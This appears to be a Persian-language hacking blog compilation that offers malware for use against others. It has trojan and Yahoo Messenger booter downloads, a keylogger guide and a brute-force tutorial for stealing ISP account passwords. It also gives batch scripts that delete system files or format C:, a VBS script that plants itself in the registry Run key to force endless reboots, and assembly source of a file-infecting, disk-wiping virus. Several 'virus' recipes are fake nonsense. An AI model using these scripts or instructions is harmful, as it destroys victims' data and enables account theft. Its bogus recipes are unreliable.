بدست آوردن پسورد یاهو دوستتان

۲.این پیغام را واسه روبات یاهو بفرستید تا پسوردی رو که میخواهید

 واستون بفرسته

۳.این مطالب را به ترتیب بنویسید و بعد واسه یاهو بفرستید تا پسورد را

بهتون بعد از ۱ روز بدهد

خط اول (ایمیل خودتون*پسوردتون)به همین شکل داخل پرانتز بنوسید

 
خط دوم(ایمیل کسی که میخواهید هکش کنید)به همین شکل داخل پرانتز بنوسید

خط سوم این نوشته را همین جوری کپی میکنید

*****___Hotmailpswd_rtrvl_Xtra-----fast-----server(victimpswd)----Snd---bk---anypswd(crack---rtrvl%^&%^&%^&"£""!_______SND_____Free----4635---Yahoo--Aol---Hotmail____(robat_freesender@yahoo.com)
Email----Cracker%^&&^&^*((

تمام همین حالا اینو واسه این ایمیل که ایمیل پسورد یاب یاهوست بفرستید این فرمان باعث میشه

 روبات هنگ کرده و هر چه را که شما میخواهید واستون بفرسته

 بچه ها من این را در یه سایتی دیدم می خواستم به شما بگم که این ها همش دروغه و طرف با

این کار ایدی پسورد شما را در میاره.

 گول این حرفا را نخورید .

موفق باشید بای.

هك واقعي با MoSucker 3.0b3

سلام

اين نرم افزاربراي كنترل يك سيستم از راه دور هست!!!!! من فقط براي ندا گزاشتمش !!! حالا اگه مخواين شما هم استفاده كنين .!!!! برای شروع ابتدا این تروجان را از اینجا دانلود کنید.

۱. با انتخاب این گزینه هر کلیدی که قربانی بزند در فایلی ذخیره می شود.

۲. در اینجا نام فایل را انتخاب می کنید.

۳. با انتخاب این گزینه برنامه فقط هنگامی که کلمات خاصی در صفحه باشد شروع به ثبت می کند.

۴. در اینجا کلماتی که در قسمت قبل گفته شد وارد می کنید.

۱. با استفاده از این قسمت شما می تونید مشخصات یک برنامه را در فایل خود وارد کنید.

این راه اذیت کردن دیگه

نابودگر اخرین ورژن یاهو مسنجر+قفل ایدی قربانی+ان اف چک ( )

من این نابودگر( بوتر )را تقدیم می کنم به  دوست خوبم جناب اقای ساسان نوبختiroweb

U-G-P-Hardcore-4-Life-v2 یک نابودگر  فوق خفن برای اخرین ورژن یاهو مسنجر(۸.۱ ) با چند کارایی خارق العاده مانند انلاین  و افلاین چک دو نفر بطور همزمان-ایدی لاکر(قفل کردن ایدی)-بوت همزمان دو ایدی با اپشنهای قوی-من خودم امروز این بوتر را فقط با ۱۰ ایدی برای روی خودم امتحان کردم فقط میتونم بگم خدا به داد کسی برسه که با این بوتر بوت میشه...........  

خلاصه کار ایی های این نابودگر
۱-بوت کردن اخرین ورژن یاهو مسنجر و  قویرترین انتی بوترها
۲-قفل کردن ایدی دیگران به مدت طولانی 
۳-ان لاین و اف لاین چک دو نفر بطور همزمان
۴-بوت کردن  دو نفر بصورت همزمان در ۲ ثانیه
۵-مشاهده پروفایل دو نفر بصورت همزمان
۶-چند اپشن برای بوت کردن قربانی
۷-فرستادن پبام شما به رومها (تبلیغات در رومها)
۸-و............

برای دیدن عکس بزرگتر روی ان کلیک کنید

هر بدبختی که با این بوتر توسط شما بوت شود هر زمان که با یاهو مسنجرش ان شود خاطره بوت شدنش را از یاد نخواهد برد

دانلود کن با حجم 500کیلو بایت

تروجان جدید برای هک یاهو مسنجر8 و 8.1 ( ۞اموزش و دانلود برنامه های هک )

مزیتهای این تروجان

غیر قابل شناسایی توسط هیچ انتی ویروسی(۸۶.۲.۲۱)
فرستادن پسورد اخرین ورژن یاهو مسنجر(۸و ۸.۱) بصورتpm
فرستادن مشخصات کانکشن قربانی
ارسال ساعت و تاریخ وصل شده قربانی به اینترنت

                                                     

من خودم این تروجان را با اخرین ورژن ار انتی ویروسهای اپدیت شده اسکن کردم که هیچ کدوم انرا شناسایی نکردند.

دانلود کن با حجم 650کیلو بایت

اموزش تصویری به همراه لینک دیگر برای دانلود در ادامه مطلب................

علائم ویروسی شدن

علائم ویروسی شدن

گدر صورتی که رایانه تان ویروسی شده باشد حداقل یکی از موارد زیر در سیستم شما دیده می شود :

1 – homepage مرور گر اینترنت شما عوض می شود . بدون آنکه خودتان آن را تغییر داده باشید .

2 – بدون اینکه شما متوجه شوید یک Toolbar جدید برایتان نصب می شود .

3 – فایروال سیستم ( اگر فایروال داشته باشید ) به شما هشدار می دهد که یک برنامه جدید در سیستم تلاش می کند به اینترنت متصل شود .

4 – shortcut جدید روی desktop ظاهر می شود بدون اینکه شما آنرا ایجاد کرده باشید .

5 – به منوی Favorite مرور گرتان یک Link جدید اضافه می شود .

6 – سیستم بدون دلیل خاصی کند می شود .

7 – عملکرد CPU بطور غیر طبیعی افزایش پیدا می کند .

8 – POP-UP های تبلیغاتی به شکل پنجره های کوچکی باز می شوند و به هیچ وجه نمی توان آنها رابست .

9 – هر زمان که search می کنید علاوه بر صفحات مورد نظرتان صفحات نا مر بوط دیگر هم برایتان باز می شود .

10 –دسترسی به اینترنت شما قطع می شود .

11 – در قسمت add/removeprogramدر controlpanel برنامه های نا خواسته ای نصب می شود .

12 – فعالیت فایر وال یا آنتی ویروس سیستم به طور ناگهانی مختا می شود .

ساخت ویروس

---------------------------------------------------------------------------------------------------------------

به قسمت start بروید و allprpgrams را انتخواب کنید accessories رفته و در گزینه ها notepad را انتخواب کنید ((نظر هم بدید))

لطفا در صورت استفاده از آموزش های وبلاگ نظر خود را بنویسید و اگر سوالی دارید در قسمت نظرات بنویسید و هر چیزی را که میخواهید بگویید تا بگذارم

سوختن مادر بورد

آموزش ساخت ویروس : این ویروس در صورت اجرا کامپیوتر فرد را به کلی خراب میکند طرز ساخت: note pad خود را باز کرده و کد پاین

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========
رادر آن کپی و پست کنید بعد به منوی فایل رفته وسیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل xxx.bat توجه (( خط فاصله ها هم جزو کد هستند ))

سوختن cpu

آموزش ساخت ویروس : طرز ساخت: note pad خود را باز کنید سپس کد cpu_567hjkblaster را در آن کپی و پست کنید از منوی فایل سیو از را انتخواب کنید و در filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل cpu.bat

سوزاندن هارد

 آموزش ساخت ویروس : طرز ساخت : note pad خود را باز کرده و کد debug e30 o31 را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat و آن را ذخیره کنید

راستش یه فولدری رو تو پوشه ویندوز پیدا کردم که اگر محتویات داخل آن را پاک کنید ویندوز زودتر بالا می آید
این هم مسیر پوشه:به فرض اگه ویندوز تو درایو c باشه
C:\WINDOWS\Prefetch
هه شو پاک کنید

 آموزش ساخت ویروس : توضیح درباره ویروس : این ویروس در internet explore فیلتر گذاری میکنه و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت . طرز ساخت : note pad خود را باز کرده و کدی را که نوشته شده است pouped-blocked-web-exploure-online&offline را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر خود را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat بعد هم فایل را ذخیره کنید

 آموزش ساخت ویروس : ابتدا Notepad ویندوز را باز کنيد. سپس اين عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس به منوی فایل رفته و سیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat

آموزش ساخت ویروس : ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:

@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.

یاهو مسنجر را باز کنید در گزینه های بالا روی im کلیک کنید بعد از باز شدن به پوشه ی دوم بروید و id مورد نظر را نوشته و بعد از آن دوتا ++بزنید مثل ++thebesthacker بعد ok کنید بعدصفحه ای باز میشود مانند صفحه ی چت بعد 10 تا L در این صفحه و 10 L در صفحه ای که با فردی که id آن بدون ++ نوشته اید و در حال چت هستید بروید و10 L در آنجا نوشته و بفرستید این کار باید 4 یا 5 بار تکرار شود نکته:برای نوشتن 10 L هر L را جدا گانه بنویسید (( L بعد اینتر _ L بعد اینتر و...)) بعد از این کار 50_60 صفحه در کامپیوتر فرد باز میشود و فرد دیسکانکت میشود توجه داشته باشید که یاهو شما و فرد مقابل باید 7 باشد

آموزش ساخت ویروس : این ویروس در صورت اجرا شدن کامپیوتر فرد را restart میکند طرز ساختن ویروس: note pad را باز کرده و کد shutdown -a را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل blester.bat

آموزش ساخت ویروس : این ویروس هارد را پر میکند و دیگر هیچ بازی و برنامه ای نصب نمیشود طرز ساخت ویروس: note pad خود را باز کرده و کد c/windows/system32/jefo/display/memory/full را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید و در قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل memory.bat بعد ذخیره کنید

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"

هک

لیست تروجان ها

تروجان 2

تروجان 3

تروجان 4

تروجان 5

تروجان 6

تروجان 7

تروجان 8

تروجان 9

تروجان 10

تروجان 11

تروجان 12

تروجان 13

تروجان 14

تروجان 15

نرم افزاری برای هک مراکز

 نرم افزاری برای هک مراکز ارائه دهنده اینترنت که با آن می توانید یوز و پس کارت های اینترنتی آی اس پی ها را بردارید. البته ما این نرم افزار را برای امنیت بیشتر مراکز اینترنتی ارائه می کنیم تا به تشکیلات خود اطمینان بیشتری داشته باشند. ( عواقب هر گونه استفاده غیر مجاز از این نرم افزار به عهده کاربر می باشد و سایت در قبال آن هیچ گونه مسئولیتی ندارد )

برای دانلود و آموزش نرم افزار روی ادامه متن کلیک کنید

دانلود نرم افزار با حجم ۹۰۰ کیلوبایت

پاسورد فایل :  www.kamyabonline.com

آموزش نرم افزار :

این نرم افزار برای بدست آوردن password کارت های اینترنتی است.
روش استفاده از برنامه:
این برنامه چند بخش دارد:
یک ....
computername or ip : 
در این قسمت IP سایتی که می خواهید از این روش اکانت آن را بدست بیاورید وارد می کنید  
Port : 
در این قسمت شما میتوانید پورت ۲۱ یا ۷۹ را وارد کنید البته اگر باز بود (باید پورت مورد نظر حتما open باشد)
current password : 
در این قسمت چیزی وارد نکنید خود برنامه به صورت اتوماتیک عملیات را انجام می دهد. 
Usernsme : 
در این قسمت باید آیدی که میخواهید کرک کنید را وارد کنید مثلا Username یک کارت
که می توانید خود شما هم حدس بزنید (معمولا برای کارت اینترنت از یک قانون خاصی استفاده می می شود )
Dictionary File : 
در این قسمت باید اسم لیست پسورد را انتخاب کنید
شما هم میتوانید از برنامه تولید پسورد خود برنامه انتخاب کنید(این کار بهتر است) یا از لیست پسوردی که
خود شما در یک فایل TXT ذخیره کرده اید استفاده کنید ....از اینترنت هم میتوانید بدست بیاورید. 

دو .....Attack Option
Dictionry Attack :
اگر میخواهید از لیست پسورد برای پیدا کردن پسورد استفاده کنید باید اینجا رو تیک بزنید
توجه : passlist معمولا یه فایل که تعداد زیادی پسورد ذخیره دارد و شما میتوانید آن را از 
اینترنت پیدا کنید و معمولا یک فایل TXT یا pas هست.
اگر اینجا را تیک بزنید باید آدرس این فایل را در هارد خود یعنی جایی که ذخیره کرده اید را
بنویسید مثلا : c: ew folderpasslist.txt
این آدرس را باید در قسمت قبل یعنی Dictionary File وارد کنید.
Brute Force attack :
این گزینه رو حتما باید تیک بزنید.
Reconnect on disconnect :
این یکی را هم حتما باید تیک بزنید.
AutoSave every 100 Attack :
این گزینه بعد از هر ۱۰۰ بار چک کردن نتیجه را براتون save میکند

سه.....Brute Force option
در این قسمت شما باید نحوه چک کردن پسورد را تنظیم کنید. برای مثال کارت اینترنتی به صورت زیر :
Username :kcn3463734
Password:  hfydhet
خوب اول شما باید یک Username دیگر را برای چک کردن حدس بزنید و با کمی تعییر
می شود به راحتی این کارا کرد چون اکثر شبکه ها برای Username های خود را از یک
فرم خاص استفاده میکنند.برای مثال من این username را انتخاب میکنم:kcn3462628
دقت کنید که تعداد کاراکتر ها ثابت است و من فقط سعی کردم اعداد آخر رو تغییر دادم.
که شانس وجود داشتن این username بیشتر می شود.
در قسمت پسورد ما فقط به دو فاکتور اهمیت می دهیم. 
اول : پسورد . اگر از عدد و حروف تشکیل شده است.
پس شما باید بر طبق همین قسمت a-z و 0-9 را تیک بزنید و اگر فقط از حروف یا عدد تشکیل شده بود یکی را تیک می زنید.
دوم : تعداد کارکتر های تشکیل دهنده پسورد ما چقدر است ؟ که برای مثال من کارکتر ۷ را انتخاب می کنم.
پس من عدد ۷ رو باید در قسمت Number of characters to start on تایپ کنم
این دیگه بستگی به خلاقیت شما دارد.

چهار ....در این قسمت کار تنظیمات دیگر تمام شده است و ما باید برای شروع
دکمه Conecct رو فشار بدهیم.
فقط یادتون باشد که این روش خیلی حوصله میخواد

گلچینشون بوتر و تروجان

اینم چنتا بوتر و تروجان که کاریشون ۲۰ هست براتون اوردم ولی عکس نداشتن من گلچینشون کردم و اوردم من ۲ساله که از همین بوتر ها استفاده می کنم و راضی هستم برای دانلود روی اسمشان کلیک کنید

بوترها

Bye Asshole V2
E-C Matrix 2
Lamer Killer
Helix
Chatlax
DazeFinal
Static Punt
MSWINSCK.OCX

تروجانها
ExeBinder
Tntjoiner
k2ps032
evillhttp.zip
Magic_PS_1.5
WinShell5.0|zip
Netsender v1.3
atmaca downloader.v2.0

اينم يه برنامه كه مي تونيد به وسيله اون يه ويروس خفن بسازيد

سلام

اينم يه برنامه كه مي تونيد به وسيله اون يه ويروس خفن بسازيد و واسه طرف بفرستيد تا اجرا كنه

حجم سرور هم خيلي كمه  (۲۱ كيلوبايت) و واسه آنتي ويروس ها هم غير قابل شناسايي هستش

‍Coded By Delphi 

دانلود

به سلیقه خودتون ویروس طراحی کنه .

این برنامه همم میتونه برای شما آیکون فایل های اگزه

اجرا بشه نمی ذاره کامپيوترش بالا بیاد

اين اسکريپت روی هرکامپيوتری اجرا بشه نمی ذاره کامپيوترش بالا بیاد. حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا می آد
کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد. می تونيد برای هر کسی بفرستيد

Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject" Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.Write

Line "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForce

Reboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+".ExecQuery

("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+" " TxtFile.WriteLine "For

 Each oOperatingSystem in oOS " TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub " TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell"

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows\CurrentVersion\

Run\Restart", "c:\restart.vbs" End sub ShutDown

اجرا بشه نمی ذاره کامپيوترش بالا بیاد

  اين اسکريپت روی هرکامپيوتری اجرا بشه نمی ذاره کامپيوترش بالا بیاد. حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا می آد
کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد. می تونيد برای هر کسی بفرستيد

Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject"<img border="0" src="Http://mihanblog.com/Yahoo/3.Gif"> Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.WriteLine "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForceReboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+"<img border="0" src="Http://mihanblog.com/Yahoo/3.Gif">.ExecQuery("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+"<img border="0" src="Http://mihanblog.com/Yahoo/3.Gif"> " TxtFile.WriteLine "For Each oOperatingSystem in oOS " TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub " TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell"<img border="0" src="Http://mihanblog.com/Yahoo/3.Gif"> WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Restart", "c:\restart.vbs" End sub ShutDown <p align="center" /></body> </html>

ساختن یک و یروس بسیار مخرب!

خوب ساختن ویروس رو آغاز می کنم
روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل love.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

CPU

  این ویروس باعث می شه CPU کسی که اون رو توی کامپیوترش اجرا می کنه بسوزه:

ابتدا مسیر زیر را دنبال کنید:

راست کلیک بر روی دسکتاپ => New => انتخاب TextDucument

پس از باز شدن Notepad کد زیر رو درون آن بنویسید و آن را با پسوند Bat ذخیره کنید.

cpu_567hjkblaster

بهتون توسیه می کنم به هیچ وجه این فایل رو درون کامپیوترتون اجرا نکنید

برای ساخت این ویروس اول

  برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه. موفق باشید نظر یادتون نره!

title " Joker! virus. Written by The BOOT SECTOR Infector ... " ; ; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original ; had multiple programming errors in it that kept it from replicating. ; My version is much more successful. ; page 255,80 code segment word public 'code' assume cs:code,ds:code org 100h main proc;edure ;EQUates... idc equ 69h ;ID character - (note: 69) cr equ 13 ;ASCII for carriage return lf equ 10 ;ASCII for line feed ;End codes. These determine what happens after the string is displayed. terminate equ 0 ;Terminate program after display halt equ 1 ;Cause the system to hang after display SimulateCritErr equ 2 ;Simulate the critical error handler return2host equ 3 ;Resume program immediately FlashFloppy equ 4 ;Wait for a key, then reset Drive A: WaitKey equ 5 ;Wait for a key, then resume program PauseKey equ 6 ;Same thing, but uses a pause message StackError equ 7 ;Cause a stack overflow (halts system) tof: ;Top-Of-File jmp begin ;Skip over program idchar: db idc ;ID character HostProgram: nop ;First run copy only! nop ;First run copy only! first_four: nop ;First run copy only! address: int 20h ;First run copy only! check: nop ;First run copy only! begin: call nextline ;Push IP+3 onto stack nextline: pop bp ;mov bp,ip sub bp,offset nextline ;bp=disp. for mem locs push ax ;Save AX call cryptor ;Decrypt jmp short retloc ;Continue program cryptor: mov al,[bp+offset encrypt_val] ;encrypt val lea si,[bp+offset toec] ;Top Of Encrypted Code mov cx,offset eoec-offset toec ;Length of " " cryptorloop: xor [si],al ;en/de crypt rol al,cl ;change code # inc si ;Next char please! loop cryptorloop ;loop if necessary ret ;Return to caller infect: call cryptor ;Encrypt code pop cx ;Restore CX for INT 21 int 21h ;Call DOS call cryptor ;Decrypt code ret ;Go back toec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤTop Of Encrypted Code InfectIt: push cx ;Save CX for sub jmp infect retloc: pop ax ;Restore AX xor di,di ;DI = 0 cli ;Disable interrupts mov ss,di ;Set up stack at: mov sp,2F0h ; 0000:02F0 sti ;Enable interrupts mov si,96h ;Vector for INT 24h mov bx,ss:[si] ;BX = offset in segment mov cx,ss:[si+2] ;CX = segment lea dx,[bp+offset int24handler] ;CS<img border="0" src="Http://mihanblog.com/Yahoo/4.Gif">X -} local handler mov ss:[si],DX ;Save offset mov ss:[si+2],cs ;Save segment mov si,es:[di+2F8h] ;Check operation mode cmp si,4643h ;'CF' if already TSRed jne GoOn ;Nope, jmp jmp return ;Yes, don't do anything GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP mov cs:[di+4Eh],cx ; to save BX and CX push cs ;Copy CS ... pop es ; ... to DS mov byte ptr [bp+offset infected],0 ;Reset infection count mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes mov di,offset tof ;TOF never changes cld ;Read left-to-right movsw ;Copy the 4 bytes movsw ;Copy the 4 bytes mov ah,1Ah ;Set DTA address ... lea dx,[bp+offset DTA] ; ... to *our* DTA int 21h ;Call DOS to set DTA mov ah,4Eh ;Find First ASCIIZ lea dx,[bp+offset filespec] ;DS<img border="0" src="Http://mihanblog.com/Yahoo/4.Gif">X -} '*.COM',0 lea si,[bp+offset filename] ;Point to file push dx ;Save DX jmp short continue ;Continue... return: mov ah,1ah ;Set DTA address ... mov dx,80h ; ... to default DTA int 21h ;Call DOS to set DTA xor di,di ;DI= 0 mov es,di ;ES= 0 mov si,96h ;Vector for INT 24h mov bx, cs:[di+4Ch] ;Restore from saved BX mov word ptr es:[si+0], bx ;Place back into vector mov cx, cs:[di+4Eh] ;Restore from saved CX mov word ptr es:[si+2], cx ;Place back into vector push cs ;Move CS ... pop es ; ... to ES mov ax,[bp+offset SavedAX] ;Restore AX xor bx,bx ;BX= 0 mov cx,bx ;CX= 0 mov dx,cx ;DX= 0 mov si,dx ;SI= 0 mov di,si ;DI= 0 mov sp,0FFFEh ;SP= FFFEh (normal) mov bp,100h ;BP= 100h (RETurn addr) push bp ; Put on stack mov bp,ax ;BP= 0 ret ;JMP to 100h nextfile: or bx,bx ;Did we open the file? jz skipclose ;No, so don't close it mov ah,3Eh ;Close file int 21h ;Call DOS to close it xor bx,bx ;Set BX back to 0 skipclose: mov ah,4Fh ;Find Next ASCIIZ continue: pop dx ;Restore DX push dx ;Re-save DX xor cx,cx ;CX= 0 xor bx,bx int 21h ;Find First/Next jnc skipjmp jmp NoneLeft ;Out of files skipjmp: mov ax,3D02h ;open file mov dx,si ;point to filespec int 21h ;Call DOS to open file jc nextfile ;Next file if error mov bx,ax ;get the handle mov ah,3Fh ;Read from file mov cx,4 ;Read 4 bytes lea dx,[bp+offset first_four] ;Read in the first 4 int 21h ;Call DOS to read cmp byte ptr [bp+offset check],idc ;Already infected? je nextfile ;Yep, try again ... ;NOTE: Delete the two lines above if you want it to re-infected programs. cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? je nextfile ;Yep, maybe next time! mov ax,4202h ;LSeek to EOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek cmp ah,0F8h ;Longer than 62K? ja nextfile ;Yep, try again... mov [bp+offset addr],ax ;Save call location mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;Point to buffer int 21h ;Save the first 4 bytes mov ah,[bp+offset encrypt_val] ;Get code number inc ah ;add 1 adc ah,0 ;increment if it's zero mov [bp+offset encrypt_val],ah ;Save new code number mov ah,40h ;Write to file mov cx,offset eof-offset begin ;Length of target code lea dx,[bp+offset begin] ;Point to virus start call InfectIt ;Exempt from encryption ComeBackHere: mov ax,4200h ;LSeek to TOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek mov ax,[bp+offset addr] ;Retrieve location inc ax ;Adjust location mov [bp+offset address],ax ;address to call mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. mov byte ptr [bp+offset check],idc ;EOFMARK mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;4 bytes are at [DX] int 21h ;Write to file inc byte ptr [bp+offset infected] ;increment counter dec byte ptr [bp+offset max2kill] ;decrement counter jz TheEnd ;If 0 then End inc byte ptr [bp+offset encrypt_val] ;change code # adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0 jmp nextfile ;Next victim! NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected? jae TheEnd ;The party's over! mov di,100h ;DI= 100h cmp word ptr [di],20CDh ;an INT 20h? je TheEnd ;Don't go to prev. dir. lea dx,[bp+offset prevdir] ;'..' mov ah,3Bh ;Set current directory int 21h ;CHDIR .. jc TheEnd ;We're through! mov ah,4Eh jmp continue ;Start over in new dir TheEnd: xor di,di ;DI= 0 mov es,di ;ES= 0 mov ah,2ah ;Get date int 21h ;Do it cmp dl,4 ;4th of the month? jne test2 ;Nope, second test cmp dh,7 ;July? jne test2 ;Nope, second test xor ax,ax ;Sector 0 jmp Kill ;Kill the disk now... test2: mov ah,2ch ;Get time int 21h ;Do it or cl,cl ;On the hour? (x:00 xM) jnz GiveUp ;Return to program cmp ch,6 ;Midnight to 5 AM ??? jnl GiveUp ;Return to program add cl,ch ;Add first number mov ax,cx ;Transfer to AX cbw ;Zero out AH add al,dh ;Add DL to AL adc al,dl ;Add DL and carry flag adc ah,0 ;Add carry to AH or ax,ax ;AX = 0 ??? jnz Kill ;Kill the disk now... inc ax ;Well, adjust first... Kill: mov dx,ax ;Sector number mov cx,1 ;One at a time.... xor bx,bx ;Point at PSP mov ah,19h ;Get current disk int 21h ;Call DOS to ^ int 26h ;Now kill the disk GiveUp: mov bx,offset message_table ;point to table mov ah,2ch ;Get time int 21h ;Call DOS to ^ inc dh ;(0-59) timeloop: cmp dh,msgs ;mapped yet? jl timedone ;Yes, jump sub dh,msgs ;try to map it jmp short timeloop ;and check out work timedone: mov al,dh ;AL gets msg # mov cl,al ;Save in CL for CritErr cbw ;AH gets 0 shl ax,1 ;AX = AX * 2 add bx,ax ;BX = index mov si,[bx] ;SI points to string mov ch,[si-1] ;CH is technique # mov dx,si ;DX points to string mov ah,9 ;Display string int 21h ;Call DOS to ^ cmp ch,terminate ;Terminate program? je TerminateProg ;Nope, next test cmp ch,halt ;Halt program? je $ ;Hang system if ch=halt cmp ch,SimulateCritErr ;Simulate CritErr? je simulate ;yes, go do it cmp ch,Return2host ;Return to host? je ResumeProgram ;yes, go do it cmp ch,FlashFloppy ;Flash drive A:? je FlashFlop ;Yes, go do it cmp ch,WaitKey ;Wait for keypress? je zwait ;Yes, go do it cmp ch,PauseKey ;Pause message w/ wait? je zpause ;Yes, go do it cmp ch,StackError ;Stack overflow? je StackErr ;Yes, go do it ;Invalid code, assume Return2host ResumeProgram: jmp return ;Return to caller StackErr: call $ ;Cause stack overflow TerminateProg: int 20h ;Yep, all done! simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... mov ah,9 ;Print string int 21h ;Call DOS to ^ mov ah,1 ;Input a char int 21h ;Call DOS to ^ lea dx,[bp+offset crlf] ;crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ cmp al,'a' ;Uppercase? jb uppercase ;Nope, jump sub al,' ' ;Yes, make 